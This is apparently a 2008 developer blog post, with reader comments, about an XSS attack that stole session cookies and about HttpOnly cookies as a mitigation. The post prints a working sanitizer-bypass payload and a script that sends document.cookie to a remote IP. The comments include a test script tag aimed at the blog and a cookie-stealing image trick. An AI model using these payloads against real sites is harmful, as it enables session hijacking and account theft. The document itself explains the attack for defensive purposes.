So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?
As it turns out, far more dangerous than expected.
To appreciate just how significant XSS hacks have become, think about how much of your life is lived online, and how exactly the websites you log into on a daily basis know who you are. It's all done with HTTP cookies, right? Those tiny little identifiying headers sent up by the browser to the server on your behalf. They're the keys to your identity as far as the website is concerned.
Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder. So tricksy things like:
<script>alert('hello XSS!');</script>
are automagically converted into their harmless encoded equivalents:
<script>alert('hello XSS!');</script>
In my friend's defense (not that he deserves any kind of defense) the website he's working on allows some HTML to be posted by users. It's part of the design. It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user. You're put in the uncomfortable position of having to discern good from bad, and decide what to do with the questionable stuff.
Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.
How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.
<img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><<img src=""http://www.a.com/a.jpg</script>"
Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:
window.location="http://1.2.3.4:81/r.php?u=" +document.links[1].text +"&l="+document.links[1] +"&c="+document.cookie;
That's right -- whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!
As we've already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don't believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That's all it takes. It's quite an eye opener.
If cookies are so precious, you might find yourself asking why browsers don't do a better job of protecting their cookies. I know my friend was. Well, there is a way to protect cookies from most malicious JavaScript: HttpOnly cookies.
When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have:
The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I'm not sure if the latest versions of Safari do or not. It's sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a bowser which isn't exactly known for its iron-clad security record.
Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here's what a cookie looks like with the HttpOnly flag set:
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Encoding: gzip Vary: Accept-Encoding Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly X-Powered-By: ASP.NET Date: Tue, 26 Aug 2008 10:51:08 GMT Content-Length: 2838
This isn't exactly news; Scott Hanselman wrote about HttpOnly a while ago. I'm not sure he understood the implications, as he was quick to dismiss it as "slowing down the average script kiddie for 15 seconds". In his defense, this was way back in 2005. A dark, primitive time. Almost pre YouTube.
HttpOnly cookies can in fact be remarkably effective. Here's what we know:
document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug.
XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.
The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpObject. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.
Even with those caveats, I believe HttpOnly cookies are a huge security win. If I -- er, I mean, if my friend -- had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!
HttpOnly cookies don't make you immune from XSS cookie theft, but they raise the bar considerably. It's practically free, a "set it and forget it" setting that's bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.
Now I just need to go tell my friend about them. I'm not sure why I bother. He never listens to me anyway.
(Special thanks to Shawn expert developer Simon for his assistance in constructing this post.)
| [advertisement] Read the largest case study ever published about lightweight peer code review in Best Kept Secrets of Peer Code Review. Free book, free shipping. |
Posted by Jeff Atwood View blog reactions
« Deadlocked! Spawning a New Process »
so, basically, HttpOnly-cookies protect you from your specific exploit and force the attacker to just redirect the users to a fake login on a page he controls or something similar.
If you allow arbitrary javascript on your site, its not your site anymore. HttpOnly-cooke does not change that.
Live and learn. I made a simple comment system for a website and it basically just removes every character that could be used in a script attack when the data is posted back to the page. Essentially it doesn't let you use any HTML or other fancy stuff in the comment area so it's a bit limited in what you can display for a comment, but at the same time it's generally pretty secure (crosses fingers) and while comment spam happens at times whatever links are posted aren't ever active.
Harvey on August 28, 2008 12:55 PMSo has that convinced your 'friend' to not use a home baked HTML sanitizer?
:-) Excellent post.
Rich Lawrence on August 28, 2008 01:08 PMFor ASP.NET developers, note the property "httpOnlyCookies":
Score!
Rick on August 28, 2008 01:13 PMKeppla, I came here to say the same thing - while this definitely does negate cookie theft, it does -not- negate the dangers of XSS as a rule.
There are many more things that XSS will open up as a vulnerability to your users.
This trick, while definitely useful, is treating the symptom and not the disease.
Chris Dary on August 28, 2008 01:13 PMInteresting... it looks like the secondary page you go to if you forget the captcha causes the link to be submitted as an anchor, which causes it to get doubled up
http://msdn.microsoft.com/en-us/library/ms228262.aspx
Rick on August 28, 2008 01:15 PMGood post, Jeff. Thanks for the information.
"Even with those caveats, I believe HttpOnly cookies are a huge security win. If I -- er, I mean, if my friend -- had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!"
It wouldn't have totally protected the users though, would it? The attacker could have got the headers through XHR as stated, or perhaps some users were using Safari, which may or may not respect HttpOnly.
John Topley on August 28, 2008 01:22 PMtypo: s/bowser/browser/
Pedant on August 28, 2008 01:23 PMWhy not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access? Implement caching as necessary, bake at 350 degrees for 15 minutes, and, voila! Fewer XSS problems. I guess someone could still masquerade as someone else if they're on the same LAN behind the same router, but hey, you can actually go pummel that person for reallzies since they're probably physically pretty close to you.
Robert C. Barth on August 28, 2008 01:25 PMThis is one reason why I associate session cookies on the server side to the client address. This exploit could still be done, but the cookie would only be useful if they were also able to form a TCP connection from the same IP.
Jody on August 28, 2008 01:33 PMum... I think this is a tad off...
First of all, any web developer worth his salt knows enough to not trust the session ID alone to identify a user... and if not, they need a swift 2x4 to the head.
Yes, you store the session ID in the cookie. On the server, you store the session ID, the username, the IP address of the user, the time of the login, etc. And you rotate this session ID every 15 minutes (or so) so old ones become invalid... if you see the same session ID used on 2 different IP addresses, you sound the god damn alarm.
HttpOnly is a nice extra layer for storing the session... but the real problem here is the fact that the session ID was not cryptographically strong in the first place.
bex on August 28, 2008 01:36 PMRobert C. Barth said: "Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access?"
I'm surprised this isn't a standard practice... is there some gotcha to this I haven't thought of? I'm not a web developer myself, so there could be a simple "yeah but" to this solution.
Sometimes it's better to buy hardware to solve that problem. There are some firewall products that record what goes out versus what comes back cookie-wise and don't allow cookies to be added from the client side, prevent replay attacks, prevent injection attacks, etc. If you write software in layers, you should also think of layering access to your website.
There's a benefit that you reduce the load on your servers to legitimate requests, etc.
burnsy on August 28, 2008 01:48 PMYeah... special thanks, but let's not forget he's the same *modesty* that was so annoying that day... maybe he could have contacted you without screwing up the site first
Juan on August 28, 2008 01:50 PMIP address doesn't help much either. The XSS can get the IP address and send it to the hacker, along with the cookie. Not too hard to spoof an IP address in an HTTP request (http://en.wikipedia.org/wiki/IP_address_spoofing), if you just want to send a command...
jorge on August 28, 2008 01:52 PMit is really hard to escape HTML yourself. There are SO MANY ways to make an XSS attack string: http://ha.ckers.org/xss.html
jorge on August 28, 2008 01:54 PMNow if only your friend would listen to the "white list don't black list" suggestion he could, with some consideration, avoid all XSS attacks.
Jonathan Moore on August 28, 2008 01:59 PM>> "Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access?"
People can still farm IP addresses and spoof them if you allow them to post external links: I post a link to a page, you click on it, the page saves the IP of your request and redirects you to a rick rolling page. I steal your session ID using the technique described above. Now what?
Leo Horie on August 28, 2008 02:03 PM> "white list don't black list" suggestion
We do whitelist; our whitelist wasn't good enough. Think of the bouncer at a club door. If you're not on the list, you don't get in.
> So has that convinced your 'friend' to not use a home baked HTML sanitizer?
No, we just improved it. That's how code evolves. Giving up is lame.
Jeff Atwood on August 28, 2008 02:06 PMLet me tell you a story.
The host name is made up, but everything else is true.
- PunBB stores the user name and the hashed password in the cookie. (It uses a different hash than the one in the DB.)
- acmeshell.inc users can have their homepages, with PHP.
Once upon a time, there was a forum at http://acmeshell.inc/forum/. (It has been moved to another server since then.) The forum used PunBB, and even though it was in /forum/, it would set cookies with a path of /.
Cookie path was /.
User homepages were at /~user/.
Guess what happened.
[img]/~joe/stealcookies.php?.jpg[/img]
No JavaScript was used.
grawity on August 28, 2008 02:10 PM> Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder.
Really? Why not do your XSS encoding logic on the output instead? As far as input is concerned, I want to record what my users typed, exactly as they typed it, as a general principle. It helps in figuring out what happened, and prevents iffy data migrations if I change the encoding logic later. How I deliver output is a different matter, of course ;-)
awh on August 28, 2008 02:15 PMI never liked the idea of HttpOnly for cookies as it prevents my favorite way of stopping another increasingly common class of attacks known as XSRF.
When HttpOnly is NOT enabled, a developer like myself can post the cookie as POST data in an AJAX request or whatever in order to show the server that the request came from the appropriate domain. It's usually called a double submitted cookie, and it's what allows applications like Gmail to ensure that the visitor who is making the request really is trying to make the request (as opposed to some evil site who is trying to grab a user's address book by including a script tag on the page that references the script dynamically generated on Google's server for that user). Another example of an actual XSRF that could have been prevented by using doubly-submitted cookies without HttpOnly can be found here: http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/.
Anyway, like Chris Dary said above, "This trick, while definitely useful, is treating the symptom and not the disease."
Andrew Mattie on August 28, 2008 02:15 PMFor people associating cookies with client IP: Remember that people want to use persistent cookies, and that people have laptops, which get different IPs depends on where they are. Also, some users are behind load-balancing proxies, which may appear to your site as different client IPs.
Jonathan on August 28, 2008 02:17 PMWhat should users do to protect themselves?
MAS on August 28, 2008 02:21 PMMy knowledge of web design = 0
with that in mind, why the hell that is not the default for every single browser? Why would other people (websites) have to do with cookies from my website?
If there is a reason at all why not make HttpOnly default and create a little thing called NoHttpOnly?
Hoffmann on August 28, 2008 02:33 PMThe following is a must-read for all webappers: <a href="http://directwebremoting.org/blog/joe/2007/10/29/web_application_security.html">http://directwebremoting.org/blog/joe/2007/10/29/web_application_security.html</a>
Andy on August 28, 2008 02:38 PMHm. The submission ruined the post if you inserted the captcha incorrectly. Bug, mr Atwood? ;)
Anyway, here we go again:
http://directwebremoting.org/blog/joe/2007/10/29/web_application_security.html
MAS, inherently, if you trust a site to run Javascript on your machine for advanced features, you're trusting them to stay in control of their content. <a href="http://blogs.technet.com/swi/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx">XSS filters are being added to newer browsers</a>, but I don't expect these intelligent blacklists to be very effective.
For sites you don't trust, <a href="https://addons.mozilla.org/en-US/firefox/addon/722">the Firefox NoScript extension</a> is solid web security--it disables rich content unless you explicitly enable it for a domain. You still have to decide whether to trust sites like Stack Overflow, but a lot of sites are still useful without Javascript. (I haven't enabled Coding Horror, for example.)
Braden on August 28, 2008 02:42 PMRather,
XSS filters: http://blogs.technet.com/swi/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx
NoScript: https://addons.mozilla.org/en-US/firefox/addon/722
Well, yeah. That's what happens when you think a sanitiser should try and clean the input. Another approach is to run a full HTML parser and construct a DOM tree from the document. Filter said DOM tree. Regenerate HTML from this tree.
Valid HTML will get through unscathed. Slightly incorrect but harmless HTML may even end up fixed. Bad will either end up filtered out of the DOM tree or so mangled that the XSS attack won't work (trickery like what's just given will fall flat and probably turn into <img src=""> )
Anon on August 28, 2008 02:53 PMGiving up is "lame"? Well, I don't want to be lame! So there's no way I'll give up on my reimplementation of the OS, compiler, web browser, and I won't even consider giving up on the rewrite of everything I've ever done!
Also, "giving up is lame" is the worst excuse I've ever heard for the "not invented here" syndrom. Noone said software is a crime against humanity - but it's actualy not always necessary or appropriate to write everything from scratch.
Bob on August 28, 2008 02:54 PM"Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder."
I don't know if you worded this poorly or if this is actually what you're doing. But that's not the first thing you do when you accept input. It's the *last* thing you do *before you output* said input to a HTML page.
correct on August 28, 2008 02:59 PMFollowing on from my last comment:
If you wrote this blog software that way then that's probably why Andy's link is garbled up above.
correct on August 28, 2008 03:16 PMNah. You should be using proper templating engine that doesn't allow "leaking" of data into markup (e.g. XSLT or TAL)
kL on August 28, 2008 03:21 PMThat's what you get for posting your sanitizer on refactormycode then. Closed source wins! ;-) j/k
Odd Rune on August 28, 2008 03:29 PMI don't get it. You had a sanitizer, yet somehow those angle brackets weren't encoded by it? How can a search-and-replace fail?
Jonas on August 28, 2008 03:49 PMThat's what Regex is for, isn't it?
There's no way that the above input would pass my Regex filters, which obviously contains "</?script". Be sure to check for octal syntax as well, because that's much harder but equally valid.
PRMan on August 28, 2008 03:52 PMSo, some guy out there has stolen the identities of everyone trying the SO beta?
Leonardo on August 28, 2008 04:29 PMI see a bunch of misinformation and misunderstandings flying around here.
First, HTTP connections are over TCP, not UDP. That means the IP address of an HTTP connection can not readily be spoofed against any system with good TCP sequence number randomization, which in turn means unless your server is running on some absolutely ancient OS they should not be spoofable. IP spoofing over UDP = easy, IP spoofing over TCP = hard. That means that it would indeed be useful to encode the IP address as part of the session cookie.
Second, to Jeff: Is your core intent here to build a working website, or to show the world what a macho programmer you are? If it's the former, you damn well should be building on solid components, and you certainly should consider a well-tested input validator and sanitizer as one of them, if you could find a suitable one.
Third, the concept of "input sanitizer" is highly questionable, as a couple people said; this is a good example of why. Trying to helpfully clean up toxic input goes right along with trying to remove that virus from the application document before you pass it along to the user. Don't sanitize bad input; reject it (preferably handling it with gloves and tongs in the process.)
Fourth, even input validation should be based on matching and accepting a limited (as in brain-dead-simple) subset of valid constructs, not on attempting to match and reject invalid constructs. Anything which doesn't clearly match a limited set of valid values should be tossed (or in a posting context, fed back to the sender with an invitation to correct it.)
There is a lot of well-developed and hard-earned wisdom about how to write security-conscious software. It starts with learning about the topic, and then not rejecting basic principles because "I want to do it my way!"
You're expecting a lot of people to trust you here; time to step up and live up to that trust.
Clifton on August 28, 2008 04:56 PM>> No, we just improved it. That's how code evolves. Giving up is lame.
Please share the code.
Firefox has a bug and cookies are still dangerous. What else is new?
When will somebody break down and fix the Internet (create a new one)? Probably when somebody breaks down and creates a new engine that is better than gasoline.
The ideas and the resources are there, but how can you change something billions of people are already benefitting from?
Josh Stodola on August 28, 2008 05:17 PMIt's an excellent idea, and provides a bit of secondary protection if you're not confident you've eliminated all the XSS vulnerabilities. But unfortunately the XHR workaround you provided renders it completely worthless.
It's always nice to hear about obscure things like that (especially when written so eloquently), but that's not a useful security measure. Even the 10 minutes it would take to implement it would be better spent checking your code for potential problems.
So, where's the post on what exactly was wrong with the html sanitizer and how exactly you fixed it? Or is that too narrow focus for the blog. :)
wds on August 28, 2008 06:09 PM@bex you just screwed anyone who sits behind a proxy server. IP alone isn't enough, and your web server is too high a layer to be effective at spotting all the ways to spoof.
With a site like SO, it's going to be far more difficult to build a sanitizer, because there will be legitimate content, etc, that has <script blah> tags. That in itself is a reason to create your own markup syntax (or borrow wiki's) because that way it's easier to verify and reject content without losing sight of the trees for the forest.
With normal punter content, I strip anything remotely looking like markup because it's not in the spec. Also most users want to use angle brackets in their normal sense, so a dead simple catch-anything is just encode all angle brackets and ampersands and store it that way. < > &. Spec changes and they want links, allow it via something like BBCode [url][/url], my sanitizer doesn't need to change, and I can validate/display only what I want to allow.
I still say that HTML/XML creators made one of the biggest WTF's by reuse of ultra-common symbols as the basis for the one format to rule them all.
As a final point, it's really hard when you have a small team trying to thwart a legion of bored 16 year old's. In some ways it's good, because DRM will never succeed because of them, in other ways it sucks when you're trying to figure out what some little script kiddie did to deface your site.
O''Malley on August 28, 2008 06:17 PM@omalley
"Also most users want to use angle brackets in their normal sense, so a dead simple catch-anything is just encode all angle brackets and ampersands and store it that way."
If you're also creating your final HTML files when you "store it" then OK. Otherwise you're doing this the wrong way around. Read my comments above, as well as others'.
You want to escape for HTML only when the data is being put into a HTML document.
Similarly, you want to escape for SQL when the data is being put into an SQL query.
In normal circumstances, you don't STORE the escaped data.
correct on August 28, 2008 07:02 PM> I'm not sure he understood the implications, as he was quick to dismiss it as "slowing down the average script kiddie for 15 seconds".
He was right. Instead of stealing document.cookie, xss.js could have set up a proxy/shell/tunnel allowing the attacker to take advantage of your friend's site using his own browser.
Jesse Ruderman on August 28, 2008 07:47 PM@correct, it all depends, and I don't see the problem with storing escaped data. It's a space tradeoff I'm willing to make, but where I feel the penalty for failure is less severe. I'm pessimistic and nowhere near perfect, so I will forget now and again despite best efforts.
If you don't allow unsafe characters, then just completely remove them from input. Done
If you do allow unsafe characters, there are two scenario's
1. you store user input verbatim, and you always remember to escape when displaying output, and you hope input cleaning works 100%.
2. you store user input escaped, and you need to remember to unescape when your user is editing.
Penalty for failing in (1) - where you forget to escape, you expose your users to xss, etc.
Penalty for failing in (2) - editable has your escaped content < > & etc. - looks stupid, but still safe.
Performance penalty in (1) is continual escaping on every view.
Performance penalty in (2) is only escaping / unescaping when edited.
(2) isn't perfect, but I'll take the hit, trusting the team to get the few edit scenarios correct versus the 100's of view scenario's correct. I call it err'ing on the side of caution.
Is there something I've overlooked? What is your objection to storing escaped data?
O''Malley on August 28, 2008 08:06 PMRestricting your cookie based on IP address is a bad idea; for two reasons:
An IP address can potentially have a LOT of users behind it, through NAT and the likes. There's even a few ISPs that I've known to do this.
And secondly, your site breaks horribly for users behind load balancing proxies (larger organisations, or even the "tor" anonymising proxy).
Pete on August 28, 2008 08:26 PMAnyone remember when Yahoo! messenger used to allow javascript (through IE i guess)? I used to type simple little bits like instant unlimited new windows or alerts to mess with my friends... thinking back on that, that's just scary!
Jesse on August 28, 2008 11:43 PMOn the same subject from J2EE perspective:
Zbigniew on August 28, 2008 11:48 PMOnce again with a fixed URL :)
http://gustlik.wordpress.com/2008/06/20/cross-site-scripting-and-httponly-attribute/
Zbigniew on August 28, 2008 11:49 PMWell done Jeff. XSS, yeah, yeah, yeah. Not my site. HA. Just found a hole and implemented httpOnly. Thanks for this reminded!
DJ Burdick on August 28, 2008 11:59 PMUnfortunately, as for any other browser-specific features or those being too recent, we might as well acknowledge that httponly for a second a then, completely forget about it because it's totally useless ... the usual web development nightmare : we're stuck to the narrowest common set of features :-(
Okay, HttpOnly is an easy temporary fix, but we all know where such tempting temp fix lead us, right ? I'm sure we all agree here it's not a substitute for sanitizing, but guess what happens in the real world ...
Vincent on August 29, 2008 01:05 AMIf you're allowing people to use the image tag to link to untrusted URLs, you are already OWNED.
For starters it allows a malcontent to cause people's browsers to GET any arbitrary URL, fucking with non-idempotent websites, doing DDOS, whatever.
On top of that, for both IE and Opera, if they GET an URL in an img tag, and find it to be javascript, THEY EXECUTE IT. The script tag was totally unnecessary in that hack for targeting IE and Opera.
Fred Blasdel on August 29, 2008 01:12 AM> No, we just improved it. That's how code evolves. Giving up is lame.
Giving up on idiotic idea is generally considered *wise*.
xxx on August 29, 2008 03:07 AMHttpOnly should be the default. Making security easily accessible (instead of an "obscure feature", as one of the commenters called it) and secure behaviour the default is an essential part of security-aware applications.
But as is typical with IE, providing safe defaults would need some sites to update their code, so unsafe is default, and no one updates their code to add safety. (Why should they? It still works, doesn't it?)
As for sanitising input: Since input data is supposed to be a structured markup, I agree with other commenters that the very first thing should be to parse it with a fault-tolerant parser (not a HTML encoder as someone else suggested) in order to get a syntactically valid canonical representation. This alone already thwarts lots of tricks, and filtering is so much more robust on a DOM tree than on some text blob. Not easier, but no one said security was easy.
And such a DOM tree nicely serializes to something which has all <img src="..."> attribute values quoted etc., at least if your DOM implementation is worth it's salt. (I recommend libxml, bindings available for practically every language)
Moe on August 29, 2008 04:45 AMWhat I do not understand is why the browser is rendering that invalid HTML block.
Also the web application should validate the input and check if it's valid HTML/XHTML and uses only the allowed tags and attributes. Moe and others seem to be thinking of the same thing.
Cristian on August 29, 2008 05:13 AMas mentioned before the sanitiser is clearly written badly. I'd bet its overly complicated in order to fail on this example (something to do with nesting angle brackets? why do you even care how they are nested if you are just encoding them differently?)
further, the cookies are being used naively "out of the box". how about encrypting the data you write to them based on the server ip or something similar so that these tricks can't work?
HttpOnly by default would still be good though... you have to protect the bad programmers from themselves when it comes to anything as accessible as web scripting.
i'm also in favour of storing the data already sanitised. doing it on every output is one of those "everything is fast for small n" scenarios, and it removes the risk of forgetting to re-sanitise the code somewhere.
jheriko on August 29, 2008 05:22 AMIs there a good existing santizer for ASP.NET?
Helen on August 29, 2008 05:25 AMGreat post, I totally agree about the need to protect cookies.
I've been using NeatHtml by Dean Brettle for protection against XSS for quite a while now and I think its the best available solution, though I admit I have not looked closely at the Html Sanitizer, you mentioned.
http://www.brettle.com/neathtml
Best Regards,
Joe Audette
Joe Audette on August 29, 2008 05:30 AMAnother barrier that is frequently used with applications that must accept user-generated HTML is to separate cookie domains: put sensitive pages on a separate origin from the user-generated content. For example, you could have admin.foo.com and comments.foo.com. If sensitive cookies are only setup for domain=admin.foo.com, an XSS on comments.foo.com won't net anything useful.
Aaron on August 29, 2008 05:38 AMSo that's what you've been so busy working on since your last post? Makes me glad I'm wracking my brain with WPF and XAML instead of Web 2.0 stuff.
Jeff Schwandt on August 29, 2008 05:45 AM"No, we just improved it. That's how code evolves. Giving up is lame."
When you find yourself at the bottom of a hole it's best to stop digging.
Also what Mr Blasdel said.
Uh, couldn't someone just filter the response from the server to remove the httpOnly flag? It seems very half-assed to use a feature that is client-side, in SOME browsers. This is a circumstance where it's important enough to come up with a solution that isn't just more obfuscated, but that actually has increases the security by an order of magnitude.
Just my opinion.
SuperJason on August 29, 2008 05:46 AMSo instead of actually fixing the problem (by, say, using a real HTML parser/sanitizer and getting rid of scripts), you've chosen to put on a second band-aid which doesn't even work the way it's supposed to half the time.
Well played. Don't bother trying to cure the disease, just treat the symptoms.
This is proof positive of the importance of creating a good design at the very beginning. Not only is it hard to fix mistakes in the design later on, but developers and geeks in general are ridiculously stubborn and can't bear the idea of having made a serious mistake; they'd rather just patch it up one way or another, until the patch fails and they have to make another patch, and so on and so forth. Not a good situation.
Aaron G on August 29, 2008 05:54 AMQuite an eye opener; thanks Jeff. Also, WTF, when are you going to accept me as a beta user?!
Gio on August 29, 2008 06:02 AMI'm not sure why you people are being so hard headed. He didn't say that he didn't ALSO fix the sanitizer. But like all things in web security adding the HttpOnly flag raises the bar. Why not do it? He isn't advocating using HttpOnly in lieu of other good security measures.
As for sanitizing input verses output I prefer to sanitize output. There are too many other systems downstream that are impacted by sanitizing the input. I write enterprise systems, not forums. There is a big difference. I can't pass a company name of Smith%32s%20Dairy to some back end COBOL system. They wouldn't know what to do with it.
For those of you that decide to sanitize your input, it must be nice to write web applications that live in a vacuum...
Matt on August 29, 2008 06:16 AMThe Web needs an architectural do-over.
With recent vulnerabilities like the Gmail vulnerability I'm really starting to question whether it is possible to write a secure web app that people will still want to use. Even if it is, it seems like it is little more than a swarm of technologies that interact in far more ways than are immediately obvious.
Matt Green on August 29, 2008 06:21 AM> Why not keep a dictionary that maps the cookie credential to the IP
> used when the credential was granted, and make sure that the IP
> matches the dictionary entry on every page access?"
Most of us get our IP addresses through DHCP, which means they can change whenever our system (or router) is rebooted.
T.E.D. on August 29, 2008 06:30 AMI'm still quite leery of your sanitiser, for the reasons I described on RefactorMyCode: you're doing blacklisting even if you think you're doing whitelisting. Your blacklist is more or less "anything that looks like BLAH BLAH X BLAH, where X isn't on the whitelist". As you can see, it's very hard to write that rule correctly. Your bouncer is still kicking bad guys out of the queue. Instead your bouncer should be picking up good guys and carrying them through the door. If the bouncer messes up, the default behaviour should be nobody gets in, not everybody getting in!
Weeble on August 29, 2008 06:32 AMAs an interesting side note to those who say you should sanitize late rather than early:
I have run into all kinds of XSS when opening tables in my database. Yes, I learned that opening said tables in PHPMyAdmin might not be a good idea.
That was an interesting experience to be sure.
I have to agree with what most people are saying. Allowing direct HTML posting that other users can see is sure to cause at least headaches, if not major problems. You're better off using some kind of wiki system, or some kind of subset of HTML, where only the tags you are interested in are allowed.
Practicality on August 29, 2008 06:35 AMHey, But how do I set the HttpOnly flag on cookies. I certainly did not find it in the preferences/options dialog.
Arvind on August 29, 2008 06:56 AM>> IP spoofing over UDP = easy, IP spoofing over TCP = hard
The biggest problem in security is that a lot of people think that "hard" is the same as "impossible". It is not. We can patch this and that hole after we've completed implementing our design and make it harder to attack our system, but we'll never really know if we're 100% safe.
In that regard, giving up is not lame. Playing catch-up is better than not. It's also better than going back to the drawing board when you're well into beta (aka scope creep), unless you have infinite budget. I do believe, though, that in the design stage, as Schneier says, security is about trade-offs. If a feature introduces security risks that are not absolutely not tolerable, then it might indeed be a good idea to drop it altogether, if designing built-in protection against a class of attacks is not feasible.
Leo Horie on August 29, 2008 07:03 AM>> IP spoofing over UDP = easy, IP spoofing over TCP = hard
As someone who has written an IP stack, I'm not really sure what about TCP makes it particularly hard. I'm not saying it isn't, I just don't see why it would be offhand.
It might (might) be tough to push aside the rightful IP holder from an established connection. However, initiating a connection with a spoofed IP should be just as easy as spoofing your IP in UDP and getting the victim to respond to you.
T.E.D. on August 29, 2008 07:10 AMLet's see if this works.....
<script type=text/javascript src="http://1.2.3.4:81/KillCodingHorror.js" />
It's amazing how easily cookies can be hijacked. Shouldn't there be some way to encrypt them too so that even if they do manage to get the cookie, it's useless?
Kris on August 29, 2008 08:45 AM> I have run into all kinds of XSS when opening tables
> in my database. Yes, I learned that opening said tables
> in PHPMyAdmin might not be a good idea.
That just shows you that PHPMyAdmin is not a safe program. The PHPMyAdmin program could not possibly know whether or not the data in the database has been scrubbed. So it should default to scrubbing it on output. It also can't enforce the rule that all input should be scrubbed before putting it into the database.
It also shows that all programs fall into this same category. There could be an SQL injection vulnerability in your code that lets the user force data into the database unscrubbed. So ALL programs (including yours) should make the assumption that the data could be tainted and scrub it before outputting it to the screen.
It is the one true way to be safe. Making assumptions is always a bad idea. Be sure. Scrub all output.
Matt on August 29, 2008 08:45 AMKris, authentication cookies ARE encrypted. This isn't an issue of privilege escalation by modifying a cookie, it's a simple replay attack.
And with respect to another comment - I wouldn't say that it's technically a blacklist, it really is a whitelist, but the problem is that *it doesn't fail safe*.
A strict parser fails safe. If it can't parse a tag, it just fails on it and the cruft disappears from subsequent output. This uber-dumb "sanitizer" can choke on all kinds of invalid input and proceed to ignore it (i.e. leave it the way it is), but the browser, being "liberal in what it accepts" as Jeff also loves to advocate, will happily try to fix it up and execute whatever badness is inside.
To believe that a few clunky regular expressions would be equally effective is pure geek conceit.
Aaron G on August 29, 2008 09:48 AM@omalley
"If you don't allow unsafe characters, then just completely remove them from input. Done"
Think about what this means. What is an unsafe character?
In the context of the user's message, nothing. It's only when you go to insert that message directly into a HTML/JS document that certain characters take on a different meaning. And so *at that time* you escape them. This way the user's message displays as they intended it AND it doesn't break the HTML. Everyone wins.
It's the same for when you're putting it into SQL, or into a shell-command, or into a URL, etc. You can't store your data escaped for every single purpose in your DB, you need to do the escaping exactly when it's needed and keep your original data raw and intact.
Your policy of stripping "unsafe" characters gets in the way of the user's perfectly legitimate message. And there's absolutely no reason for that.
"You store user input verbatim, and you always remember to escape when displaying output, and you hope input cleaning works 100%"
There is no hope required. You don't have to "always remember" if you have a standard method of building DB queries and building HTML documents/templating, and it's tested. And you should have this.
Where and when to escape (assuming a DB store):
1. Untrusted data comes in
2. Validate it (do NOT alter it)
And, if it's valid
3. Store it (escape for SQL here)
later, if you want to display it in a HTML page:
retrieve from DB and escape for HTML
or, if you want to use it in a unix command line:
retrieve from DB and escape for shell
or, into a url:
retrieve from DB and URL encode
etc..
The key is not MODIFYING the user's data. Just accept or reject. Then you escape if necessary when you use it in different contexts.
Now you can do anything you want with your data. You don't have to impose confusing constraints on what your users can and can't say.
correct on August 29, 2008 09:50 AMGood comments. Are there any web pages which serve as checklists against XSS so we asp.net developers can implemenet all these secure ideas?
(Jeff, I saw a comment from you which didn't have a different bg color)
Abdu on August 29, 2008 09:51 AMI absolutely agree with correct above. Too many times I see programs that won't let you include single quotes or other such characters because they consider them to be dangerous. There is no point in that.
As I said above you need to consider all data to potentially be tainted. There is no way to guarantee that the data came from a user and passed through your input scrubber. It could have been inserted using an SQL injection attack or could have come from some COBOL/RPG program upstream. So you have to scrub it on output anyway. Why scrub it both places and end up causing headaches for other systems that you integrate with?
Matt on August 29, 2008 10:08 AM@O'Malley
you said:
> @bex you just screwed anyone who sits behind a proxy server.
um... no.
A proxy means multiple usernames sharing one IP. That's totally fine. Its no different than me running two browsers, and logged in as two users. My example blocks multiple IPs sharing one username. Totally different. And as @Clifton says, IP spoofing over TCP is pretty hard... especially if you rotate the session ID.
Back to the issue of sanitizing, I again agree with @Clifton. You don't sanitize input: you FRIGGING REJECT it!
In other words, escape ALL angle brackets, unless the its from a string that EXACTLY MATCHES safe HTML, like:
<b></b>
<i></i>
<ul></ul>
<ol></ol>
<li></li>
